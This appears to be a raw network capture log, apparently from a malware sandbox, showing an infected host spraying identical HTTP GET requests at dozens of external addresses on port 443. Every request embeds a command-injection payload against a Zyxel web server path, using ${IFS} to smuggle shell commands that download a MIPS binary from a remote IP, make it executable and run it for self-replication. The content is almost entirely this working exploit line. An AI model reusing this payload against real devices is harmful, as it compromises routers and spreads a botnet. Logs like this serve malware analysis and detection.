                                                Jan 12, 2024 18:23:54.326077938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                266192.168.2.1335358169.237.32.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.326101065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                267192.168.2.136022688.23.58.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.326147079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                268192.168.2.135040289.25.168.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.326180935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                269192.168.2.1350472132.229.214.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.326205015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                270192.168.2.134773247.206.238.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.326356888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                271192.168.2.1332818130.228.115.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.326375961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                272192.168.2.1351214175.224.217.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:54.326380014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                273192.168.2.135117052.244.28.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:55.330055952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                274192.168.2.1339006159.255.227.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:55.330086946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                275192.168.2.1342534103.4.85.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:55.330120087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                276192.168.2.134036661.209.19.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:55.330166101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                277192.168.2.1347694202.246.208.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:56.333651066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                278192.168.2.136097658.16.58.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:56.333679914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                279192.168.2.134668813.234.37.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:56.333708048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                280192.168.2.135200647.37.208.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:56.333765984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                281192.168.2.1338154121.81.136.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:56.333796024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                282192.168.2.1340442142.194.13.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:56.333815098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                283192.168.2.1338116143.217.27.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:56.333837986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                284192.168.2.135222090.89.85.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:56.333918095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                285192.168.2.13508169.139.109.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:56.333950043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                286192.168.2.1337102164.151.36.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:56.333971977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                287192.168.2.1348134112.179.74.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:56.334192038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                288192.168.2.1354650124.22.92.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337353945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                289192.168.2.134059448.207.144.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337410927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                290192.168.2.1348120216.201.112.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337454081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                291192.168.2.1354142139.56.79.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337476969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                292192.168.2.134982039.112.6.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337516069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                293192.168.2.133930219.252.164.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337574959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                294192.168.2.1352580184.210.248.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337595940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                295192.168.2.1333198110.182.87.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337677002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                296192.168.2.134451864.112.64.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337718964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                297192.168.2.1346970196.137.1.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337764978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                298192.168.2.134600648.81.95.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337821007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                299192.168.2.133886093.62.234.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337830067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                300192.168.2.1360164131.160.81.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337847948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                301192.168.2.1344698123.53.134.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337930918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                302192.168.2.1357714223.43.195.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:57.337975979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                303192.168.2.134260444.4.111.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:58.340641975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                304192.168.2.133408839.133.166.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:58.340693951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                305192.168.2.135985213.47.21.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:58.340728998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                306192.168.2.134937618.24.168.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:58.340751886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                307192.168.2.1339252174.168.188.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:58.340758085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                308192.168.2.136011842.123.126.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:58.340802908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                309192.168.2.1338858211.171.230.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:58.340840101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                310192.168.2.1334824174.119.100.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:58.340874910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                311192.168.2.13338485.196.88.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:58.340910912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                312192.168.2.1334744219.187.14.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:58.341053009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                313192.168.2.1334880122.162.247.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344022989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                314192.168.2.135443087.94.101.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344089985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                315192.168.2.1359676206.156.61.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344125986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                316192.168.2.134628079.11.206.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344142914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                317192.168.2.133278439.207.250.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344202042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                318192.168.2.1337010102.83.180.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344238997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                319192.168.2.1345900140.120.93.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344276905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                320192.168.2.1339944148.210.204.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344333887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                321192.168.2.13531849.54.192.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344345093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                322192.168.2.133442442.67.158.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344559908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                323192.168.2.134641887.183.122.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344568014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                324192.168.2.133421827.79.209.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:59.344620943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                325192.168.2.1337406121.120.188.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:00.348277092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                326192.168.2.133823667.151.143.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:00.348375082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                327192.168.2.1339692140.64.167.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.354373932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                328192.168.2.134436013.243.81.197443
                                                TimestampBytes transferredDirectionData
